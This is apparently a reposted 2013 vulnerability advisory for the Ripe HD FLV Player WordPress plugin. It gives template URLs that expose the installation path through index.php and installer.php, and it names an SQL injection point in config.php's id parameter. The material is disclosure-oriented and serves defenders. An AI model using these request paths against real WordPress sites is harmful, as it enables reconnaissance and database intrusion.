Ripe HD FLV Player Plugin for WordPress Multiple Script Direct Request Path Disclosure Vulnerability

Published on March 19th, 2013
Summary

Ripe HD FLV Player Plugin for WordPress Multiple Script Direct Request Path Disclosure suffers from Vulnerability

Credit:

The information has been provided by Zikou-16.


Details

Vulnerable Systems:
 * Ripe HD FLV Player Plugin for WordPress

Ripe HD FLV Player Plugin for WordPress contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a remote attacker sends a direct request for the index.php and installer.php scripts, which discloses the software’s installation path resulting in a loss of confidentiality. While such information is relatively low risk, it is often useful in carrying out additional, more focused attacks.

#=> Exploit :
——————
1#=> Full Path Disclosure :

http://[target]/[path]/wp-content/plugins/ripe-hd-player/index.php
http://[target]/[path]/wp-content/plugins/ripe-hd-player/installer.php

——-
2#=> SQL Injection

http://[target]/[path]/wp-content/plugins/ripe-hd-player/config.php?id=[SQLi]

Disclosure Timeline:
Disclosure Date:2013-01-19
Exploit Publish Date:2013-01-19

Categories: Exploits
Tags:

Related Posts

Exploits Featured News

Cybercriminals Using WHO Alias For Phishing Campaign

Exploits Featured News

Coronavirus Outbreak Scam, Malware, Phishing Vulnerabilities

Exploits Featured

IBM Cognos Business Intelligence 10.2.2 Cross-Site Request Forgery (CSRF) Vulnerability